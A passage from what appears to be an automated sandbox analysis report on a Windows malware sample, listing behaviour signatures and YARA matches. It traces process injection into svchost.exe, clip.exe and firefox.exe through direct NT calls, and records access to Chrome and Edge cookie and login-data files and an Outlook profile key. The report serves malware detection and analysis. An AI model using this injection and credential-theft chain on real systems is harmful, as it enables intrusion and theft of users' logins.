            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]2_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]2_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]2_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]2_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]2_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]2_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]2_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]2_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]2_2_032FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]2_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]2_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]2_2_0325E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]2_2_0325EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]2_2_032E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]2_2_03232F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h]2_2_0326CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325AF69 mov eax, dword ptr fs:[00000030h]2_2_0325AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325AF69 mov eax, dword ptr fs:[00000030h]2_2_0325AF69
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ADA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ADA66C
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC81AC
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC8189 SetUnhandledExceptionFilter,0_2_00AC8189

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 1088Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7CC008Jump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ADB106 LogonUserW,0_2_00ADB106
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AA3D19
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE411C SendInput,keybd_event,0_2_00AE411C
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE74BB mouse_event,0_2_00AE74BB
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MGQeZjDXc3.exe"Jump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ADA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ADA66C
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00AE71FA
            Source: PXASisZrdVntP.exe, 00000005.00000000.2467635155.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378390916.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3379407030.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: MGQeZjDXc3.exe, PXASisZrdVntP.exe, 00000005.00000000.2467635155.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378390916.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3379407030.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: PXASisZrdVntP.exe, 00000005.00000000.2467635155.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378390916.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3379407030.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MGQeZjDXc3.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: PXASisZrdVntP.exe, 00000005.00000000.2467635155.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378390916.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3379407030.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC65C4 cpuid 0_2_00AC65C4
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00AF091D
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00B1B340 GetUserNameW,0_2_00B1B340
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00AD1E8E
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00ABDDC0
            Source: MGQeZjDXc3.exe, 00000000.00000002.2145008798.0000000001383000.00000004.00000020.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2121813628.000000000132D000.00000004.00000020.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2130530238.0000000001383000.00000004.00000020.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2131348031.0000000001383000.00000004.00000020.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2124546230.0000000001383000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: MGQeZjDXc3.exeBinary or memory string: WIN_81
            Source: MGQeZjDXc3.exeBinary or memory string: WIN_XP
            Source: MGQeZjDXc3.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: MGQeZjDXc3.exeBinary or memory string: WIN_XPe
            Source: MGQeZjDXc3.exeBinary or memory string: WIN_VISTA
            Source: MGQeZjDXc3.exeBinary or memory string: WIN_7
            Source: MGQeZjDXc3.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
